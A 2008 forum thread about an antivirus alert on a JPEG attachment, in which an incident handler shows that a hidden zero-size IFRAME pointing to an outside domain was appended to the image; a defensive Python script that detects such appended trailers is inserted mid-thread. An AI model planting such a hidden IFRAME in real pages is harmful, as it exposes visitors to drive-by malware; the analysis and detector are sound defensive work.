Trojan.Clicker Whilst browsing the Systems 2008

Posted by: Blueknowz on 20 February 2008

Whilst browsing the Systems 2008 on page 12, my anti-virus checker Steganos threw up a Trojan; thought you would like to know!!
Posted on: 20 February 2008 by dave simpson
Most likely a false positive. Nothing to report here with NOD32.
Posted on: 20 February 2008 by {OdS}
Nothing to report with Sophos either... Still, it might be config related.
Posted on: 20 February 2008 by 555
No problems detected with V-com either.

Maybe a coincidence that you were looking at P12 when you were attacked Blueknowz?
Have you run a system virus (etc) check/sweep on your 'puter?
Posted on: 20 February 2008 by Blueknowz
Check running now, thanks guys
Posted on: 20 February 2008 by dave simpson
Cool..let us know if you cannot remove it and we'll assist. Do post the exact name of the infection.
Posted on: 20 February 2008 by Blueknowz
detected: Trojan program Trojan-Clicker.HTML.IFrame.js URL: http://forums.naim-audio.com/groupee_files/attachments/...ControlArm_54110.jpg
I get this every time I access page 12, any ideas? ..Jim
Posted on: 20 February 2008 by dave simpson
It appears to be a false positive. I'm not familiar with your A-V vendor. If they offer support for this situation, I'd email them the link so they can investigate and send a correction out with their next push to exclude the code.

I'm running scans here but it's highly unlikely anything malicious will turn up considering the variety of scans thread posters have initialized already. As well, rest assured, Naim will have already been on the case;-)

Keep us posted...
Posted on: 20 February 2008 by Blueknowz
Thanks Dave, Steganos is part of the Karpensky Labs Group; will contact them after the full system scan is complete, ....Jim
Posted on: 20 February 2008 by dave simpson
If you meant "Kaspersky"--no worries. One of the finest scan engines available. They will sort the problem. Do let us know the final results. Expect Adam to move this thread to the padded cell though.

best,

dave
Posted on: 20 February 2008 by Steve Hall
Blueknowz,

Your antivirus is alerting on the file you suggest.

Although the file is a JPEG, it has the following string embedded in it:

<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>

This is what is triggering your Antivirus as the IFRAME is detected as malicious due to the zero height and width parameters.

The host un.uiiiu.com is not resolving, but the domain uiiiu.com does exist, and is located in China.

I would suggest that this graphic is removed from the site, as should that host be reactivated (and it's common for these things to lie dormant and be turned on at a later date), then it could impact some Naim customers.

Steve (Incident Handler for the SANS Internet Storm Centre)
Posted on: 20 February 2008 by BigH47
Is there a potential problem for the rest of us?
What should we do if yes?
Posted on: 20 February 2008 by Steve Hall
It shouldn't, as the URL it is trying to trick the browser into downloading is failing.

Although, I've no way of knowing if it was successful at a point in the past, or if it will become so.

The real exploit which would do damage would be downloaded from the baidu.html file, so as that fails, I can't look any further.
Posted on: 20 February 2008 by Blueknowz
quote:
<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>

Steve, how did you find this info from what I posted? I can't see it in that string, although I have heard of viruses & Trojans hidden in JPEGs ....Jim
Posted on: 20 February 2008 by Steve Hall
As your AV triggered on that one file, I downloaded it and submitted it to VirusTotal. The results can be seen HERE

So, as some AV vendors concurred that there was a virus in there somewhere, it was worth a further look.

If you look at the VirusTotal analysis the "Packer" type is listed as append, which just indicates that the threat has been added to the end of the file.

So, let's dump the end of the file: using my trusty Mac Pro and the strings command, you get

<IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>

at the end of the file, just as we were told it would be.

The host part of the URL is un.uiiiu.com which does not resolve if you do a DNS lookup on it.

Although doing a whois on uiiiu.com does indicate that it exists, and is registered as being in China.

Hope this helps.
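Steve's two posts above describe the whole check: a JPEG that carries an appended (VirusTotal's "append" packer type) zero-size IFRAME after the real image data, which `strings` reveals at the end of the file. The script below is an added example, not Steve's or Naim's code, that automates that check from a defender's side: it walks the JPEG marker segments to find the image's own End-Of-Image marker (rather than searching for the last FF D9 bytes, which appended data could contain), reports how many bytes trail it, and flags any IFRAME in the trailer whose WIDTH or HEIGHT is 0. The sample JPEG and the placeholder host `hidden.example.invalid` are constructed for the example.

```python
"""Detect data appended after a JPEG's End-Of-Image (EOI) marker and flag
hidden IFRAME tags in it, the zero-size IFRAME pattern from the thread.
Added example, not code from the thread; the sample JPEG is constructed."""
import re
from typing import Dict, List

SOI = b"\xff\xd8"

# <iframe ...> tag with its attribute body captured; attributes parsed separately.
IFRAME_RE = re.compile(rb"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(rb"""(\w+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.IGNORECASE)


def jpeg_end_offset(blob: bytes) -> int:
    """Walk the JPEG marker segments and return the offset just past EOI.
    Stops at the image's own EOI, so FF D9 bytes inside appended data are
    not mistaken for the end of the picture (a naive rfind would be)."""
    if blob[:2] != SOI:
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(blob):
        if blob[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = blob[pos + 1]
        if marker == 0xFF:                      # fill byte, skip it
            pos += 1
            continue
        if marker == 0xD9:                      # EOI: the image ends here
            return pos + 2
        if 0xD0 <= marker <= 0xD8 or marker == 0x01:   # standalone markers, no length
            pos += 2
            continue
        if pos + 4 > len(blob):
            break
        seg_len = int.from_bytes(blob[pos + 2:pos + 4], "big")  # length includes itself
        pos += 2 + seg_len
        if marker == 0xDA:                      # SOS: entropy-coded data follows
            # Advance to the next real marker; FF00 is byte stuffing and
            # FFD0..FFD7 are restart markers, both part of the scan data.
            while pos + 1 < len(blob):
                nxt = blob[pos + 1]
                if blob[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def find_iframes(html: bytes) -> List[Dict[str, object]]:
    """Return every IFRAME in the blob with src/width/height and a hidden flag."""
    found = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.decode().lower(): v.strip(b"\"'").decode("latin-1")
                 for k, v in ATTR_RE.findall(m.group(1))}
        width = attrs.get("width", "").strip()
        height = attrs.get("height", "").strip()
        found.append({
            "src": attrs.get("src", ""),
            "width": width,
            "height": height,
            # A zero-size frame has no visual purpose: this is what AV keys on.
            "hidden": width == "0" or height == "0",
        })
    return found


def scan_jpeg(blob: bytes) -> Dict[str, object]:
    """Report how many bytes follow the EOI marker and any IFRAMEs among them."""
    end = jpeg_end_offset(blob)
    trailer = blob[end:]
    return {"image_bytes": end, "trailer_bytes": len(trailer),
            "iframes": find_iframes(trailer)}


def build_sample(trailer: bytes) -> bytes:
    """Constructed minimal JPEG: JFIF APP0, one SOS whose scan data contains a
    stuffed FF00 and an RST0 marker, then EOI, then `trailer` appended."""
    app0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
    scan_data = b"\x12\x34\xff\x00\x56\xff\xd0\x78"
    return SOI + app0 + sos + scan_data + b"\xff\xd9" + trailer


# Constructed trailer in the shape reported in the thread (placeholder host).
CONSTRUCTED_TRAILER = (b'<IFRAME SRC="http://hidden.example.invalid/landing.htm" '
                       b'WIDTH=0 HEIGHT=0></IFRAME>')

if __name__ == "__main__":
    print(scan_jpeg(build_sample(CONSTRUCTED_TRAILER)))
```

Run against a real file with `scan_jpeg(open(path, "rb").read())`; a non-zero `trailer_bytes` on an image served by your own site is worth a look even when no IFRAME is found, since any appended content has no business being there.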
Posted on: 21 February 2008 by Blueknowz
Steve, this is the reply I received from Steganos

Dear Sir or Madam,

Thank you for writing to Steganos Customer Service.

It seems that this site is infected. Please contact the admin of this board and ask for a possible infection on his side.

If you are still experiencing difficulties, please feel free to write back.

When answering this e-mail, please leave the subject line unchanged. This is to ensure the mail returns directly to my inbox. Thank you.

Kind regards

Stefan Butz
Steganos Customer Service